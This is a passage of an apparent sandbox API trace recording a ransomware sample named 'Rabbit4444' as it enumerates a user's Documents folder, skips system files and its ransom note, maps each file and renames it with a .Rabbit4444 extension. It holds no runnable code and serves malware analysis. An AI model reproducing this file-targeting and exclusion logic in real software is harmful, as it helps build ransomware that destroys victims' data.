ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 1 [0049.498] lstrcmpiW (lpString1="Database1.accdb", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.499] lstrcmpiW (lpString1="Database1.accdb", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.499] lstrcmpiW (lpString1="Database1.accdb", lpString2="Rabbit4444.exe") returned -1 [0049.499] lstrcmpiW (lpString1="Database1.accdb", lpString2=".") returned 1 [0049.499] lstrcmpiW (lpString1="Database1.accdb", lpString2="..") returned 1 [0049.499] lstrcmpiW (lpString1="Database1.accdb", lpString2="windows") returned -1 [0049.499] lstrcmpiW (lpString1="Database1.accdb", lpString2="bootmgr") returned 1 [0049.499] lstrcmpiW (lpString1="Database1.accdb", lpString2="pagefile.sys") returned -1 [0049.499] lstrcmpiW (lpString1="Database1.accdb", lpString2="boot") returned 1 [0049.499] lstrcmpiW (lpString1="Database1.accdb", lpString2="ids.txt") returned -1 [0049.499] lstrcmpiW (lpString1="Database1.accdb", lpString2="NTUSER.DAT") returned -1 [0049.499] lstrcpyW (in: lpString1=0x130eb6c, lpString2="Database1.accdb" | out: lpString1="Database1.accdb") returned="Database1.accdb" [0049.499] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", dwFileAttributes=0x0) returned 1 [0049.502] lstrlenW (lpString="Database1.accdb") returned 15 [0049.502] lstrlenW (lpString="Rabbit4444") returned 10 [0049.502] lstrcmpiW (lpString1="ase1.accdb", lpString2="Rabbit4444") returned -1 [0049.503] lstrlenW (lpString=".dll") returned 4 [0049.503] lstrcmpiW (lpString1="ccdb", lpString2=".dll") returned 1 [0049.503] lstrlenW (lpString=".lnk") returned 4 [0049.503] lstrcmpiW (lpString1="ccdb", lpString2=".lnk") returned 1 [0049.503] lstrlenW (lpString=".ini") returned 4 [0049.503] lstrcmpiW (lpString1="ccdb", lpString2=".ini") returned 1 [0049.503] lstrlenW (lpString=".sys") returned 4 [0049.503] lstrcmpiW (lpString1="ccdb", lpString2=".sys") returned 1 [0049.503] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.503] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.503] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14081363987) returned 1 [0049.503] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=348160) returned 1 [0049.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0049.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0049.503] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x55300, lpName=0x0) returned 0x298 [0049.504] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x55300) returned 0x2b0000 [0049.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0049.519] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0049.520] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14083057367) returned 1 [0049.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0049.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0049.520] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0049.523] CloseHandle (hObject=0x298) returned 1 [0049.523] CloseHandle (hObject=0x278) returned 1 [0049.523] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\Database1.accdb.Rabbit4444") returned 52 [0049.523] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb.rabbit4444"), dwFlags=0x1) returned 1 [0049.524] InterlockedExchangeAdd (in: Addend=0xff618, Value=348160 | out: Addend=0xff618) returned 21521104 [0049.524] InterlockedExchangeAdd (in: Addend=0xff624, Value=16 | out: Addend=0xff624) returned 3594 [0049.524] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0049.524] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.525] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.525] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0049.525] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0049.525] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0049.525] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0049.525] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0049.525] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0049.525] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0049.525] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0049.525] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0049.525] lstrcpyW (in: lpString1=0x130eb6c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0049.525] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini", dwFileAttributes=0x22) returned 1 [0049.525] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini", dwFileAttributes=0x6) returned 1 [0049.525] lstrlenW (lpString="desktop.ini") returned 11 [0049.525] lstrlenW (lpString="Rabbit4444") returned 10 [0049.525] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0049.525] lstrlenW (lpString=".dll") returned 4 [0049.525] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0049.525] lstrlenW (lpString=".lnk") returned 4 [0049.525] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0049.525] lstrlenW (lpString=".ini") returned 4 [0049.525] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0049.525] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95be0780, ftCreationTime.dwHighDateTime=0x1d4c696, ftLastAccessTime.dwLowDateTime=0x8d8c37a0, ftLastAccessTime.dwHighDateTime=0x1d4d378, ftLastWriteTime.dwLowDateTime=0x8d8c37a0, ftLastWriteTime.dwHighDateTime=0x1d4d378, nFileSizeHigh=0x0, nFileSizeLow=0x6bb4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGflni.doc", cAlternateFileName="")) returned 1 [0049.525] lstrcmpiW (lpString1="DGflni.doc", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.525] lstrcmpiW (lpString1="DGflni.doc", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.526] lstrcmpiW (lpString1="DGflni.doc", lpString2="Rabbit4444.exe") returned -1 [0049.526] lstrcmpiW (lpString1="DGflni.doc", lpString2=".") returned 1 [0049.526] lstrcmpiW (lpString1="DGflni.doc", lpString2="..") returned 1 [0049.526] lstrcmpiW (lpString1="DGflni.doc", lpString2="windows") returned -1 [0049.526] lstrcmpiW (lpString1="DGflni.doc", lpString2="bootmgr") returned 1 [0049.526] lstrcmpiW (lpString1="DGflni.doc", lpString2="pagefile.sys") returned -1 [0049.526] lstrcmpiW (lpString1="DGflni.doc", lpString2="boot") returned 1 [0049.526] lstrcmpiW (lpString1="DGflni.doc", lpString2="ids.txt") returned -1 [0049.526] lstrcmpiW (lpString1="DGflni.doc", lpString2="NTUSER.DAT") returned -1 [0049.526] lstrcpyW (in: lpString1=0x130eb6c, lpString2="DGflni.doc" | out: lpString1="DGflni.doc") returned="DGflni.doc" [0049.526] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\DGflni.doc", dwFileAttributes=0x0) returned 1 [0049.526] lstrlenW (lpString="DGflni.doc") returned 10 [0049.526] lstrlenW (lpString="Rabbit4444") returned 10 [0049.526] lstrcmpiW (lpString1="DGflni.doc", lpString2="Rabbit4444") returned -1 [0049.526] lstrlenW (lpString=".dll") returned 4 [0049.526] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.526] lstrlenW (lpString=".lnk") returned 4 [0049.526] lstrcmpiW (lpString1=".doc", lpString2=".lnk") returned -1 [0049.526] lstrlenW (lpString=".ini") returned 4 [0049.526] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0049.526] lstrlenW (lpString=".sys") returned 4 [0049.526] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0049.526] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\DGflni.doc" (normalized: "c:\\users\\fd1hvy\\documents\\dgflni.doc"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.526] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.526] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14083724687) returned 1 [0049.527] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=27572) returned 1 [0049.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0049.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0049.527] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6ec0, lpName=0x0) returned 0x298 [0049.527] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6ec0) returned 0x70000 [0049.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0049.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0049.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0049.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0049.528] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14083881320) returned 1 [0049.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0049.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0049.528] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.528] CloseHandle (hObject=0x298) returned 1 [0049.529] CloseHandle (hObject=0x278) returned 1 [0049.529] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\DGflni.doc.Rabbit4444") returned 47 [0049.529] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\DGflni.doc" (normalized: "c:\\users\\fd1hvy\\documents\\dgflni.doc"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\DGflni.doc.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\dgflni.doc.rabbit4444"), dwFlags=0x1) returned 1 [0049.530] InterlockedExchangeAdd (in: Addend=0xff618, Value=27584 | out: Addend=0xff618) returned 21869264 [0049.530] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3610 [0049.530] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c50bfe0, ftCreationTime.dwHighDateTime=0x1d5398b, ftLastAccessTime.dwLowDateTime=0x18f08800, ftLastAccessTime.dwHighDateTime=0x1d4f2eb, ftLastWriteTime.dwLowDateTime=0x18f08800, ftLastWriteTime.dwHighDateTime=0x1d4f2eb, nFileSizeHigh=0x0, nFileSizeLow=0x5b09, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dsWpol B2cKgrldiUL.xlsx", cAlternateFileName="DSWPOL~1.XLS")) returned 1 [0049.530] lstrcmpiW (lpString1="dsWpol B2cKgrldiUL.xlsx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.530] lstrcmpiW (lpString1="dsWpol B2cKgrldiUL.xlsx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.530] lstrcmpiW (lpString1="dsWpol B2cKgrldiUL.xlsx", lpString2="Rabbit4444.exe") returned -1 [0049.530] lstrcmpiW (lpString1="dsWpol B2cKgrldiUL.xlsx", lpString2=".") returned 1 [0049.530] lstrcmpiW (lpString1="dsWpol B2cKgrldiUL.xlsx", lpString2="..") returned 1 [0049.530] lstrcmpiW (lpString1="dsWpol B2cKgrldiUL.xlsx", lpString2="windows") returned -1 [0049.530] lstrcmpiW (lpString1="dsWpol B2cKgrldiUL.xlsx", lpString2="bootmgr") returned 1 [0049.530] lstrcmpiW (lpString1="dsWpol B2cKgrldiUL.xlsx", lpString2="pagefile.sys") returned -1 [0049.530] lstrcmpiW (lpString1="dsWpol B2cKgrldiUL.xlsx", lpString2="boot") returned 1 [0049.530] lstrcmpiW (lpString1="dsWpol B2cKgrldiUL.xlsx", lpString2="ids.txt") returned -1 [0049.530] lstrcmpiW (lpString1="dsWpol B2cKgrldiUL.xlsx", lpString2="NTUSER.DAT") returned -1 [0049.530] lstrcpyW (in: lpString1=0x130eb6c, lpString2="dsWpol B2cKgrldiUL.xlsx" | out: lpString1="dsWpol B2cKgrldiUL.xlsx") returned="dsWpol B2cKgrldiUL.xlsx" [0049.530] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\dsWpol B2cKgrldiUL.xlsx", dwFileAttributes=0x0) returned 1 [0049.531] lstrlenW (lpString="dsWpol B2cKgrldiUL.xlsx") returned 23 [0049.531] lstrlenW (lpString="Rabbit4444") returned 10 [0049.531] lstrcmpiW (lpString1="ldiUL.xlsx", lpString2="Rabbit4444") returned -1 [0049.531] lstrlenW (lpString=".dll") returned 4 [0049.531] lstrcmpiW (lpString1="xlsx", lpString2=".dll") returned 1 [0049.531] lstrlenW (lpString=".lnk") returned 4 [0049.531] lstrcmpiW (lpString1="xlsx", lpString2=".lnk") returned 1 [0049.531] lstrlenW (lpString=".ini") returned 4 [0049.531] lstrcmpiW (lpString1="xlsx", lpString2=".ini") returned 1 [0049.531] lstrlenW (lpString=".sys") returned 4 [0049.531] lstrcmpiW (lpString1="xlsx", lpString2=".sys") returned 1 [0049.531] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\dsWpol B2cKgrldiUL.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\dswpol b2ckgrldiul.xlsx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.531] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.531] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14084173827) returned 1 [0049.531] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=23305) returned 1 [0049.531] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0049.531] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0049.531] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5e10, lpName=0x0) returned 0x298 [0049.531] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5e10) returned 0x70000 [0049.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0049.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0049.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0049.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0049.532] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14084324238) returned 1 [0049.533] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0049.533] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0049.533] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.533] CloseHandle (hObject=0x298) returned 1 [0049.533] CloseHandle (hObject=0x278) returned 1 [0049.535] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\dsWpol B2cKgrldiUL.xlsx.Rabbit4444") returned 60 [0049.535] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\dsWpol B2cKgrldiUL.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\dswpol b2ckgrldiul.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\dsWpol B2cKgrldiUL.xlsx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\dswpol b2ckgrldiul.xlsx.rabbit4444"), dwFlags=0x1) returned 1 [0049.535] InterlockedExchangeAdd (in: Addend=0xff618, Value=23312 | out: Addend=0xff618) returned 21896848 [0049.535] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3611 [0049.535] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b6500d0, ftCreationTime.dwHighDateTime=0x1d4ef0f, ftLastAccessTime.dwLowDateTime=0x787839c0, ftLastAccessTime.dwHighDateTime=0x1d500c5, ftLastWriteTime.dwLowDateTime=0x787839c0, ftLastWriteTime.dwHighDateTime=0x1d500c5, nFileSizeHigh=0x0, nFileSizeLow=0x137bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dWc4-70S.docx", cAlternateFileName="DWC4-7~1.DOC")) returned 1 [0049.535] lstrcmpiW (lpString1="dWc4-70S.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.535] lstrcmpiW (lpString1="dWc4-70S.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.535] lstrcmpiW (lpString1="dWc4-70S.docx", lpString2="Rabbit4444.exe") returned -1 [0049.535] lstrcmpiW (lpString1="dWc4-70S.docx", lpString2=".") returned 1 [0049.535] lstrcmpiW (lpString1="dWc4-70S.docx", lpString2="..") returned 1 [0049.535] lstrcmpiW (lpString1="dWc4-70S.docx", lpString2="windows") returned -1 [0049.535] lstrcmpiW (lpString1="dWc4-70S.docx", lpString2="bootmgr") returned 1 [0049.535] lstrcmpiW (lpString1="dWc4-70S.docx", lpString2="pagefile.sys") returned -1 [0049.535] lstrcmpiW (lpString1="dWc4-70S.docx", lpString2="boot") returned 1 [0049.535] lstrcmpiW (lpString1="dWc4-70S.docx", lpString2="ids.txt") returned -1 [0049.535] lstrcmpiW (lpString1="dWc4-70S.docx", lpString2="NTUSER.DAT") returned -1 [0049.536] lstrcpyW (in: lpString1=0x130eb6c, lpString2="dWc4-70S.docx" | out: lpString1="dWc4-70S.docx") returned="dWc4-70S.docx" [0049.536] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\dWc4-70S.docx", dwFileAttributes=0x0) returned 1 [0049.536] lstrlenW (lpString="dWc4-70S.docx") returned 13 [0049.536] lstrlenW (lpString="Rabbit4444") returned 10 [0049.536] lstrcmpiW (lpString1="4-70S.docx", lpString2="Rabbit4444") returned -1 [0049.536] lstrlenW (lpString=".dll") returned 4 [0049.536] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0049.536] lstrlenW (lpString=".lnk") returned 4 [0049.536] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0049.536] lstrlenW (lpString=".ini") returned 4 [0049.536] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0049.536] lstrlenW (lpString=".sys") returned 4 [0049.536] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0049.536] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\dWc4-70S.docx" (normalized: "c:\\users\\fd1hvy\\documents\\dwc4-70s.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.536] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.536] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14084692600) returned 1 [0049.536] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=79804) returned 1 [0049.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0049.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0049.536] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13ac0, lpName=0x0) returned 0x298 [0049.536] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13ac0) returned 0x70000 [0049.538] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.538] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0049.538] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.538] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0049.539] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.539] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0049.539] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.539] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0049.539] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14084963419) returned 1 [0049.539] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0049.539] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0049.539] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.540] CloseHandle (hObject=0x298) returned 1 [0049.540] CloseHandle (hObject=0x278) returned 1 [0049.540] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\dWc4-70S.docx.Rabbit4444") returned 50 [0049.540] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\dWc4-70S.docx" (normalized: "c:\\users\\fd1hvy\\documents\\dwc4-70s.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\dWc4-70S.docx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\dwc4-70s.docx.rabbit4444"), dwFlags=0x1) returned 1 [0049.541] InterlockedExchangeAdd (in: Addend=0xff618, Value=79808 | out: Addend=0xff618) returned 21920160 [0049.541] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3612 [0049.541] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79178200, ftCreationTime.dwHighDateTime=0x1d51213, ftLastAccessTime.dwLowDateTime=0x9c7da620, ftLastAccessTime.dwHighDateTime=0x1d4c17d, ftLastWriteTime.dwLowDateTime=0x9c7da620, ftLastWriteTime.dwHighDateTime=0x1d4c17d, nFileSizeHigh=0x0, nFileSizeLow=0x2932, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H8Y_brCG8G6csUiI.docx", cAlternateFileName="H8Y_BR~1.DOC")) returned 1 [0049.541] lstrcmpiW (lpString1="H8Y_brCG8G6csUiI.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.541] lstrcmpiW (lpString1="H8Y_brCG8G6csUiI.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.541] lstrcmpiW (lpString1="H8Y_brCG8G6csUiI.docx", lpString2="Rabbit4444.exe") returned -1 [0049.541] lstrcmpiW (lpString1="H8Y_brCG8G6csUiI.docx", lpString2=".") returned 1 [0049.541] lstrcmpiW (lpString1="H8Y_brCG8G6csUiI.docx", lpString2="..") returned 1 [0049.541] lstrcmpiW (lpString1="H8Y_brCG8G6csUiI.docx", lpString2="windows") returned -1 [0049.541] lstrcmpiW (lpString1="H8Y_brCG8G6csUiI.docx", lpString2="bootmgr") returned 1 [0049.541] lstrcmpiW (lpString1="H8Y_brCG8G6csUiI.docx", lpString2="pagefile.sys") returned -1 [0049.541] lstrcmpiW 